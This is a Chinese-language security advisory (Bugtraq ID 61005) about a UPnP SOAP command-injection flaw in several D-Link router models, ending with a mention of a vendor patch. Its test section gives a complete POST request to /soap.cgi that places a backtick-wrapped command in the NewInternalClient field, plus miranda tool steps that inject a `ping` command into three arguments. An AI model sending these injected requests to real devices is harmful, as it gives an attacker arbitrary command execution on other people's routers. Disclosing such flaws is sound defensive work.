发布日期:2013-07-07
更新日期:2013-07-11
受影响系统:
D-Link DIR-300
D-Link DIR-600 2.12b02
D-Link DIR-645
D-Link DIR-865L 1.05b03
D-Link DIR-845 1.01b02
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61005
D-Link是国际著名网络设备和解决方案提供商,产品包括多种路由器设备。
多个 D-Link 产品存在命令注入漏洞,利用这些漏洞攻击者可以在受影响设备上下文中执行任意命令。受影响设备包括:
DIR-300 rev B running firmware 2.14b01
DIR-600 running firmware 2.16b01
DIR-645 running firmware 1.04b01
DIR-845 running firmware 1.01b02
DIR-865 running firmware 1.05b03
<*来源:m-1-k-3
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=> Parameter: NewInternalClient, NewInternalClient, NewInternalPort
Example Request:
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Host: 10.8.28.133:49152
Content-Type: text/xml
Content-Length: 649
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration></NewLeaseDuration>
<NewInternalClient>`COMMAND`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewExternalPort>634</NewExternalPort>
<NewRemoteHost></NewRemoteHost>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>45</NewInternalPort>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
You could use miranda for your own testing:
* NewInternalClient
Required argument:
Argument Name: NewInternalClient
Data Type: string
Allowed Values: []
Set NewInternalClient value to: `ping 192.168.0.100`
* NewExternalPort
Required argument:
Argument Name: NewExternalPort
Data Type: ui2
Allowed Values: []
Set NewExternalPort value to: `ping 192.168.0.100`
* NewInternalPort
Required argument:
Argument Name: NewInternalPort
Data Type: ui2
Allowed Values: []
Set NewInternalPort value to: `ping 192.168.0.100`
Screenshot:
建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: